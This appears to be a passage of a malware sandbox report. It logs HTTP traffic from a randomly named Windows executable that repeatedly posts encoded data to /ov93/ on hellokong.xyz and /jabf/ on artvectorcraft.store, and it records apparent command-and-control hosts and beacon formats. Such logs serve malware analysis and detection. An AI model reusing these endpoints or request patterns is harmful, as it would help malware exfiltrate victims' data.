                          Jul 1, 2024 15:12:17.749577999 CEST533INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:17 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.449751203.161.49.220804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:19.661497116 CEST784OUTPOST /ov93/ HTTP/1.1
                          Host: www.hellokong.xyz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.hellokong.xyz
                          Content-Length: 224
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.hellokong.xyz/ov93/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 31 73 51 53 42 63 4b 42 63 75 45 56 5a 36 2f 71 4a 54 6b 65 70 59 6b 74 78 69 4a 7a 74 67 72 57 42 6a 36 33 4d 61 45 6c 53 71 36 7a 41 57 6f 63 47 66 6f 7a 61 69 6a 75 45 70 51 56 37 42 54 6a 4c 74 47 52 66 62 49 31 39 62 30 68 47 52 68 67 72 2f 4e 52 6b 77 55 71 64 2b 78 7a 42 30 4c 36 63 4f 39 73 33 63 54 62 44 66 4e 54 41 61 42 34 6c 63 34 76 4d 4c 7a 6c 46 31 62 78 6c 68 48 4d 68 30 79 64 42 57 69 62 71 36 2f 73 77 2f 7a 31 47 74 6d 43 6b 41 31 67 2f 62 77 49 54 6c 76 69 53 4a 64 59 52 4e 65 6b 64 69 79 47 64 6f 79 73 6c 76 31 67 64 42 70 43 68 31 34 41 36 52 4a 59 67 4b 65 41 47 30 6f 74 37 6a 2b 39 55 72 41 6d 71 6a 77 73 72 43 6f 3d
                          Data Ascii: dBOL8fg=1sQSBcKBcuEVZ6/qJTkepYktxiJztgrWBj63MaElSq6zAWocGfozaijuEpQV7BTjLtGRfbI19b0hGRhgr/NRkwUqd+xzB0L6cO9s3cTbDfNTAaB4lc4vMLzlF1bxlhHMh0ydBWibq6/sw/z1GtmCkA1g/bwITlviSJdYRNekdiyGdoyslv1gdBpCh14A6RJYgKeAG0ot7j+9UrAmqjwsrCo=
                          Jul 1, 2024 15:12:20.280612946 CEST533INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:20 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.449752203.161.49.220804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:22.188563108 CEST10866OUTPOST /ov93/ HTTP/1.1
                          Host: www.hellokong.xyz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.hellokong.xyz
                          Content-Length: 10304
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.hellokong.xyz/ov93/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 31 73 51 53 42 63 4b 42 63 75 45 56 5a 36 2f 71 4a 54 6b 65 70 59 6b 74 78 69 4a 7a 74 67 72 57 42 6a 36 33 4d 61 45 6c 53 71 79 7a 44 6b 77 63 48 38 77 7a 62 69 6a 75 48 70 51 55 37 42 53 37 4c 74 76 59 66 62 45 6c 39 59 4d 68 58 48 31 67 6a 74 6c 52 72 77 55 71 41 75 78 79 46 30 4c 56 63 50 4e 67 33 59 33 62 44 66 4e 54 41 63 6c 34 6c 4f 41 76 4f 4c 7a 6b 43 31 62 39 76 42 47 54 68 30 37 67 42 57 33 6d 71 4a 6e 73 77 66 6a 31 48 65 65 43 37 51 31 2b 38 62 78 58 54 6c 53 38 53 4a 42 79 52 4f 43 43 64 68 75 47 4d 38 6a 7a 68 76 42 2f 4b 42 46 72 2b 57 64 68 37 79 34 64 76 35 43 38 42 6e 45 4c 6f 67 61 49 4f 38 6c 73 34 44 67 49 79 45 4e 55 50 6a 45 58 59 43 4b 57 33 62 6e 55 36 54 50 48 78 53 49 72 39 6c 42 70 51 56 30 58 4c 59 57 30 66 6c 4e 58 74 76 62 42 6f 59 69 51 49 42 65 6b 70 30 31 53 64 4f 6a 31 42 39 4c 6a 39 4f 4d 4b 70 62 4c 4c 2f 33 2f 53 53 52 58 4a 79 42 65 53 77 62 64 53 6a 65 73 64 53 67 4f 31 43 6d 32 54 36 32 4f 56 35 44 39 53 4d 34 33 50 47 42 6d 59 76 47 [TRUNCATED]
                          Data Ascii: dBOL8fg=1sQSBcKBcuEVZ6/qJTkepYktxiJztgrWBj63MaElSqyzDkwcH8wzbijuHpQU7BS7LtvYfbEl9YMhXH1gjtlRrwUqAuxyF0LVcPNg3Y3bDfNTAcl4lOAvOLzkC1b9vBGTh07gBW3mqJnswfj1HeeC7Q1+8bxXTlS8SJByROCCdhuGM8jzhvB/KBFr+Wdh7y4dv5C8BnELogaIO8ls4DgIyENUPjEXYCKW3bnU6TPHxSIr9lBpQV0XLYW0flNXtvbBoYiQIBekp01SdOj1B9Lj9OMKpbLL/3/SSRXJyBeSwbdSjesdSgO1Cm2T62OV5D9SM43PGBmYvG3GASB5bcFKczEat8uj6/aOMiN3dmEQ5BQ57xOhadFcZ04ayh2C+ijIAfvi+5c2hrIElGr6GkkEExpwk9oKwt0dRGPNJO2ptkHWhRUf3tlANW+yKUayTB5O+uIYQvQTVEtuFFs34O0q2aVWn6gfix90wHfiHOOno2EuzM31wGtYpYZ+owNTlu7zfjdEHymmtRbQFpROo6MQXpZDQYed6jBLAnLqz+d91FPcXClxyBgnVGuOxZRedjS7y0xyctIMiLcAMsCzPtjhMA74IVyfzhaI8uQ/C8wRpGF0T8OxGQtGWFsGzekpUhU0wjtvcpsvDzCTCV90FGT8gP3pGE9MH1UGfTMf2unaaP+XBGC7DPjt0H55vOmj6UpapN1SvYi2fKFic+X+qdnxXr6gScZe9JLvc3MPK/2tya1xyIBkYBciL5Z4mqKKlJi4TKUqFPSQLO4j+q4jpenba3ViWyBIuOdeO2GyviSaALsALWT7JR41R8X4ycWBUGB0mn9f+mY9BGpRItE4EFu+k/P4hTvGNP9T9JgJrAs20o0xev0a5kA4k2KipAalJfD9Stce2T36demrQdYlGIfSzxIB+eGuNcdujL4s0S3tqBCgzcKpbAF5JSJct4JPZQqGSSzcrara2/q6sLnY3DIB4WfWBApn8gxIIRPJKfjYahNK [TRUNCATED]
                          Jul 1, 2024 15:12:22.864697933 CEST533INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:22 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.449753203.161.49.220804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:24.720112085 CEST496OUTGET /ov93/?dBOL8fg=4u4yCo7OQPMCdKi2Ln8aiJAigi9vuRKQeDagcagOc8nEJXUOPucQWQe7OcI8vFTvM/uLBaUz+qY2H3sZqNwpjFxKCsR2JAuqbshkvfKiRYpiG9JChfURZOQ=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.hellokong.xyz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:12:25.323398113 CEST548INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:25 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.449754142.250.74.211804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:30.379024029 CEST785OUTPOST /jabf/ HTTP/1.1
                          Host: www.artvectorcraft.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.artvectorcraft.store
                          Content-Length: 204
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.artvectorcraft.store/jabf/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 48 45 4e 6a 65 59 73 37 71 33 32 78 42 6b 7a 48 30 7a 64 46 62 6a 64 4a 44 38 69 5a 39 70 4d 77 6e 30 6e 38 35 4e 72 4a 6c 39 56 75 78 63 45 46 35 38 2b 48 6b 42 6c 56 37 5a 75 54 4d 79 56 50 6a 79 4b 48 42 4b 62 78 38 4c 76 78 78 54 4d 50 4b 52 74 49 50 45 35 51 64 50 46 33 35 32 44 55 43 7a 73 73 6f 42 75 4e 70 45 6a 32 52 57 4f 77 4b 64 4d 55 5a 6a 76 55 67 65 79 43 59 6b 51 53 4f 35 35 63 4f 47 73 50 36 59 66 74 63 79 6b 62 41 6d 4d 75 73 50 4d 50 2f 62 79 66 75 71 45 68 37 63 65 43 49 4a 70 6b 74 4d 33 66 55 42 4e 4e 32 75 2f 62 76 4a 72 6d 4f 66 33 55 35 35 79 6c 50 51 3d 3d
                          Data Ascii: dBOL8fg=HENjeYs7q32xBkzH0zdFbjdJD8iZ9pMwn0n85NrJl9VuxcEF58+HkBlV7ZuTMyVPjyKHBKbx8LvxxTMPKRtIPE5QdPF352DUCzssoBuNpEj2RWOwKdMUZjvUgeyCYkQSO55cOGsP6YftcykbAmMusPMP/byfuqEh7ceCIJpktM3fUBNN2u/bvJrmOf3U55ylPQ==
                          Jul 1, 2024 15:12:31.009145975 CEST1236INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Server: ghs
                          Content-Length: 1566
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                          Jul 1, 2024 15:12:31.009171009 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.449755142.250.74.211804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:33.079741955 CEST805OUTPOST /jabf/ HTTP/1.1
                          Host: www.artvectorcraft.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.artvectorcraft.store
                          Content-Length: 224
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.artvectorcraft.store/jabf/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 48 45 4e 6a 65 59 73 37 71 33 32 78 41 41 33 48 31 51 31 46 63 44 64 4b 47 38 69 5a 6b 5a 4d 30 6e 30 72 38 35 4d 75 4f 6c 4f 78 75 6f 35 41 46 34 39 2b 48 6e 42 6c 56 7a 35 75 57 54 43 55 44 6a 79 57 6c 42 50 7a 78 38 4c 54 78 78 53 38 50 4c 6d 35 50 64 6b 35 57 45 66 46 35 33 57 44 55 43 7a 73 73 6f 42 54 67 70 45 37 32 53 6c 57 77 4b 34 34 58 48 7a 76 62 33 75 79 43 54 45 51 65 4f 35 34 35 4f 45 4a 71 36 63 76 74 63 77 38 62 42 33 4d 74 6c 50 4d 4a 68 72 7a 39 75 6f 5a 30 35 73 76 73 44 50 30 45 30 66 72 4c 52 48 63 58 6e 66 65 4d 39 4a 50 56 54 59 2b 67 30 36 50 73 55 51 30 51 49 4c 32 55 37 31 65 47 72 79 4d 71 51 59 5a 49 6f 4e 77 3d
                          Data Ascii: dBOL8fg=HENjeYs7q32xAA3H1Q1FcDdKG8iZkZM0n0r85MuOlOxuo5AF49+HnBlVz5uWTCUDjyWlBPzx8LTxxS8PLm5Pdk5WEfF53WDUCzssoBTgpE72SlWwK44XHzvb3uyCTEQeO545OEJq6cvtcw8bB3MtlPMJhrz9uoZ05svsDP0E0frLRHcXnfeM9JPVTY+g06PsUQ0QIL2U71eGryMqQYZIoNw=
                          Jul 1, 2024 15:12:33.724863052 CEST1236INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Server: ghs
                          Content-Length: 1566
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                          Jul 1, 2024 15:12:33.724921942 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.449756142.250.74.211804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:35.610552073 CEST10887OUTPOST /jabf/ HTTP/1.1
                          Host: www.artvectorcraft.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.artvectorcraft.store
                          Content-Length: 10304
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.artvectorcraft.store/jabf/
